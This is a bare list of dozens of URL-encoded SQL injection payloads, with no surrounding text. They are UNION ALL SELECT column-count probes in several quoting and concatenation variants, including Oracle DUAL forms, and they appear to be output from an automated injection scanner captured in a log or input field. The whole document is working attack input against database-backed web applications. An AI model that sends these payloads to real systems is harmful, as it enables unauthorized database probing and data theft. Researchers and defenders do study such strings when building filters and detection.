-5590%27%20WHERE%202064%3D2064%20UNION%20ALL%20SELECT%202064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064%2C2064--%20 -3628%27%20WHERE%203804%3D3804%20UNION%20ALL%20SELECT%203804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804%2C3804--%20 -6062%27%20WHERE%207631%3D7631%20UNION%20ALL%20SELECT%207631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631%2C7631--%20 -7306%27%20WHERE%203438%3D3438%20UNION%20ALL%20SELECT%203438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438%2C3438--%20 -6044%22%20WHERE%208203%3D8203%20UNION%20ALL%20SELECT%208203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203%2C8203--%20 -4121%22%20WHERE%206406%3D6406%20UNION%20ALL%20SELECT%206406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406%2C6406--%20 -3967%22%20WHERE%206097%3D6097%20UNION%20ALL%20SELECT%206097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097%2C6097--%20 -9798%22%20WHERE%202360%3D2360%20UNION%20ALL%20SELECT%202360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360%2C2360--%20 -7000%22%20WHERE%203072%3D3072%20UNION%20ALL%20SELECT%203072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072--%20 -9347%22%20WHERE%207290%3D7290%20UNION%20ALL%20SELECT%207290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290%2C7290--%20 -5016%22%20WHERE%206294%3D6294%20UNION%20ALL%20SELECT%206294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294%2C6294--%20 -4025%22%20WHERE%208375%3D8375%20UNION%20ALL%20SELECT%208375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375%2C8375--%20 -6632%22%20WHERE%207174%3D7174%20UNION%20ALL%20SELECT%207174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174%2C7174--%20 -6410%22%20WHERE%209335%3D9335%20UNION%20ALL%20SELECT%209335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335%2C9335--%20 -7128%27%7C%7C%28SELECT%20%27ytjX%27%20FROM%20DUAL%20WHERE%203307%3D3307%20UNION%20ALL%20SELECT%203307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307%2C3307--%20 -5776%27%7C%7C%28SELECT%20%27NKng%27%20FROM%20DUAL%20WHERE%207801%3D7801%20UNION%20ALL%20SELECT%207801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801%2C7801--%20 -1306%27%7C%7C%28SELECT%20%27qEjQ%27%20FROM%20DUAL%20WHERE%207542%3D7542%20UNION%20ALL%20SELECT%207542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542%2C7542--%20 -9374%27%7C%7C%28SELECT%20%27YUhB%27%20FROM%20DUAL%20WHERE%202772%3D2772%20UNION%20ALL%20SELECT%202772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772%2C2772--%20 -7061%27%7C%7C%28SELECT%20%27lxiD%27%20FROM%20DUAL%20WHERE%203225%3D3225%20UNION%20ALL%20SELECT%203225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225%2C3225--%20 -4248%27%7C%7C%28SELECT%20%27gCqT%27%20FROM%20DUAL%20WHERE%205351%3D5351%20UNION%20ALL%20SELECT%205351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351%2C5351--%20 -2860%27%7C%7C%28SELECT%20%27sYHs%27%20FROM%20DUAL%20WHERE%209806%3D9806%20UNION%20ALL%20SELECT%209806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806%2C9806--%20 -1374%27%7C%7C%28SELECT%20%27IBcd%27%20FROM%20DUAL%20WHERE%203335%3D3335%20UNION%20ALL%20SELECT%203335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335%2C3335--%20 -1175%27%7C%7C%28SELECT%20%27oCWk%27%20FROM%20DUAL%20WHERE%209536%3D9536%20UNION%20ALL%20SELECT%209536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536%2C9536--%20 -1022%27%7C%7C%28SELECT%20%27auOT%27%20FROM%20DUAL%20WHERE%208928%3D8928%20UNION%20ALL%20SELECT%208928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928%2C8928--%20 -8885%27%7C%7C%28SELECT%20%27ZGDK%27%20WHERE%208989%3D8989%20UNION%20ALL%20SELECT%208989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989%2C8989--%20 -5910%27%7C%7C%28SELECT%20%27Csrl%27%20WHERE%209328%3D9328%20UNION%20ALL%20SELECT%209328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328%2C9328--%20 -4961%27%7C%7C%28SELECT%20%27yEsl%27%20WHERE%205449%3D5449%20UNION%20ALL%20SELECT%205449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449%2C5449--%20 -3639%27%7C%7C%28SELECT%20%27ODvN%27%20WHERE%201632%3D1632%20UNION%20ALL%20SELECT%201632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632%2C1632--%20 -6608%27%7C%7C%28SELECT%20%27GJYG%27%20WHERE%203369%3D3369%20UNION%20ALL%20SELECT%203369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369%2C3369--%20 -4541%27%7C%7C%28SELECT%20%27HRiS%27%20WHERE%205057%3D5057%20UNION%20ALL%20SELECT%205057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057%2C5057--%20 -9169%27%7C%7C%28SELECT%20%27vLxh%27%20WHERE%203832%3D3832%20UNION%20ALL%20SELECT%203832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832%2C3832--%20 -4947%27%7C%7C%28SELECT%20%27SGRt%27%20WHERE%209666%3D9666%20UNION%20ALL%20SELECT%209666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666%2C9666--%20 -5436%27%7C%7C%28SELECT%20%27iRGi%27%20WHERE%202426%3D2426%20UNION%20ALL%20SELECT%202426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426%2C2426--%20 -6774%27%7C%7C%28SELECT%20%27jWEV%27%20WHERE%207428%3D7428%20UNION%20ALL%20SELECT%207428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428%2C7428--%20 -5529%27%2B%28SELECT%20ORXD%20WHERE%209463%3D9463%20UNION%20ALL%20SELECT%209463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463%2C9463--%20 -4327%27%2B%28SELECT%20NoYy%20WHERE%203666%3D3666%20UNION%20ALL%20SELECT%203666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666%2C3666--%20 -4175%27%2B%28SELECT%20FIsZ%20WHERE%209092%3D9092%20UNION%20ALL%20SELECT%209092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092%2C9092--%20 -9619%27%2B%28SELECT%20IBYM%20WHERE%204243%3D4243%20UNION%20ALL%20SELECT%204243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243%2C4243--%20 -9445%27%2B%28SELECT%20vMTq%20WHERE%201621%3D1621%20UNION%20ALL%20SELECT%201621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621%2C1621--%20 -6869%27%2B%28SELECT%20lJjU%20WHERE%204251%3D4251%20UNION%20ALL%20SELECT%204251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251%2C4251--%20 -8942%27%2B%28SELECT%20eqSu%20WHERE%206187%3D6187%20UNION%20ALL%20SELECT%206187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187%2C6187--%20 -6937%27%2B%28SELECT%20DQBD%20WHERE%205007%3D5007%20UNION%20ALL%20SELECT%205007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007%2C5007--%20 -9615%27%2B%28SELECT%20GgPq%20WHERE%201092%3D1092%20UNION%20ALL%20SELECT%201092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092%2C1092--%20 -4898%27%2B%28SELECT%20bMel%20WHERE%204250%3D4250%20UNION%20ALL%20SELECT%204250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250%2C4250--%20 -3961%27%2B%28SELECT%20%27uVJF%27%20WHERE%204115%3D4115%20UNION%20ALL%20SELECT%204115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115%2C4115--%20 -2240%27%2B%28SELECT%20%27UxGS%27%20WHERE%203383%3D3383%20UNION%20ALL%20SELECT%203383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383%2C3383--%20 -9208%27%2B%28SELECT%20%27rMoS%27%20WHERE%204686%3D4686%20UNION%20ALL%20SELECT%204686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686%2C4686--%20 -9192%27%2B%28SELECT%20%27wpYY%27%20WHERE%201168%3D1168%20UNION%20ALL%20SELECT%201168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168%2C1168--%20 -9880%27%2B%28SELECT%20%27pOaO%27%20WHERE%201518%3D1518%20UNION%20ALL%20SELECT%201518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518%2C1518--%20 -6535%27%2B%28SELECT%20%27bvUv%27%20WHERE%208971%3D8971%20UNION%20ALL%20SELECT%208971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971%2C8971--%20 -1220%27%2B%28SELECT%20%27zNDp%27%20WHERE%202669%3D2669%20UNION%20ALL%20SELECT%202669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669%2C2669--%20 -9337%27%2B%28SELECT%20%27ILTU%27%20WHERE%206579%3D6579%20UNION%20ALL%20SELECT%206579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579%2C6579--%20 -8612%27%2B%28SELECT%20%27wUQu%27%20WHERE%205953%3D5953%20UNION%20ALL%20SELECT%205953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953%2C5953--%20 